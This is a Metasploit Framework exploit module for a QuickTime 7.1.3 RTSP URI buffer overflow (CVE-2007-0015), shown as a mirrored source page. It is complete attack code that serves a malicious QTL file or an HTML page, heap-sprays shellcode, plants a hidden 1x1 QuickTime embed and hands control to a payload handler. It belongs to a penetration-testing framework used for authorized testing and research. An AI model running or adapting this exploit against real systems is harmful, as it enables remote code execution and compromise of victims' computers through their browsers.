Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  # include Msf::Exploit::Remote::BrowserAutopwn

12
  # autopwn_info({

13
  #  :os_name => OperatingSystems::Match::WINDOWS,

14
  #  # No particular browser.  Works on at least IE6 and Firefox 1.5.0.3

15
  #  :javascript => true,

16
  #  :rank       => NormalRanking, # reliable memory corruption

17
  #  :vuln_test  => nil,

18
  # })

19


20
  def initialize(info = {})

21
    super(

22
      update_info(

23
        info,

24
        'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',

25
        'Description' => %q{

26
          This module exploits a buffer overflow in Apple QuickTime

27
          7.1.3. This module was inspired by MOAB-01-01-2007.  The

28
          Browser target for this module was tested against IE 6 and

29
          Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the

30
          QuickTime plugin.

31
        },

32
        'Author' => [ 'MC', 'egypt' ],

33
        'License' => MSF_LICENSE,

34
        'References' => [

35
          [ 'CVE', '2007-0015' ],

36
          [ 'OSVDB', '31023'],

37
          [ 'BID', '21829' ]

38
        ],

39
        'DefaultOptions' => {

40
          'EXITFUNC' => 'process',

41
        },

42
        'Payload' => {

43
          'Space' => 500,

44
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",

45
        },

46
        'Platform' => 'win',

47
        'Targets' => [

48
          [ 'Automatic', {} ],

49
          [

50
            'Apple QuickTime Player 7.1.3',

51
            {

52
              'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;)

53
            }

54
          ],

55
          [

56
            'Browser Universal',

57
            {

58
              'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2

59
            }

60
          ],

61
        ],

62
        'Privileged' => false,

63
        'DisclosureDate' => '2007-01-01',

64
        'DefaultTarget' => 0,

65
        'Notes' => {

66
          'Reliability' => UNKNOWN_RELIABILITY,

67
          'Stability' => UNKNOWN_STABILITY,

68
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

69
        }

70
      )

71
    )

72
  end

73


74
  def on_request_uri(client, request)

75
    return if ((p = regenerate_payload(client)) == nil)

76


77
    if (target.name =~ /Automatic/)

78
      if (request['User-Agent'] =~ /QuickTime/i)

79
        target = targets[1]

80
      else

81
        target = targets[2]

82
      end

83
    end

84


85
    cruft = rand_text_alphanumeric(4)

86
    # This is all basically filler on the browser target because we can't

87
    # expect the SEH to be in a reliable place across multiple browsers.

88
    # Heap spray ftw.

89
    sploit = rand_text_english(307)

90
    sploit << p.encoded + "\xeb\x06" + rand_text_english(2)

91
    sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')

92


93
    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)

94
      print_status("Sending exploit QTL file (target: #{target.name})")

95
      content = build_qtl(sploit)

96
    else

97
      print_status("Sending init HTML")

98


99
      shellcode = Rex::Text.to_unescape(p.encoded)

100
      url = ((datastore['SSL']) ? "https://" : "http://")

101
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])

102
      url << ":" + datastore['SRVPORT'].to_s

103
      url << get_resource

104
      js = <<-ENDJS

105
          #{js_heap_spray}

106
          sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);

107
      ENDJS

108
      content = "<html><body><script><!--\n#{js}//--></script>"

109
      content << <<-ENDEMBED

110
          <OBJECT

111
          CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"

112
          WIDTH="1"

113
          HEIGHT="1"

114
          CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">

115
          <PARAM name="SRC"        VALUE = "#{url}/#{cruft}.qtl">

116
          <PARAM name="QTSRC"      VALUE = "#{url}/#{cruft}.qtl">

117
          <PARAM name="AUTOPLAY"   VALUE = "true"               >

118
          <PARAM name="TYPE"       VALUE = "video/quicktime"    >

119
          <PARAM name="TARGET"     VALUE = "myself"             >

120
          <EMBED

121
            SRC        = "#{url}/#{cruft}.qtl"

122
            QTSRC      = "#{url}/#{cruft}.qtl"

123
            TARGET     = "myself"

124
            WIDTH      = "1"

125
            HEIGHT     = "1"

126
            AUTOPLAY   = "true"

127
            PLUGIN     = "quicktimeplugin"

128
            TYPE       = "video/quicktime"

129
            CACHE      = "false"

130
            PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >

131
          </EMBED>

132
          </OBJECT>

133
      ENDEMBED

134
      content << "</body></html>"

135
    end

136


137
    send_response(client, content, { 'Content-Type' => "text/html" })

138


139
    # Handle the payload

140
    handler(client)

141
  end

142


143
  def build_qtl(overflow)

144
    cruft = rand_text_english(4)

145


146
    content = "<?xml version=\"1.0\"?>\n"

147
    content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"

148
    content << "<embed autoplay=\"true\" \n"

149
    content << "moviename=\"#{cruft}\" \n"

150
    content << "qtnext=\"#{cruft}\" \n"

151
    content << "type=\"video/quicktime\" \n"

152
    content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"

153
  end

154
end

155


156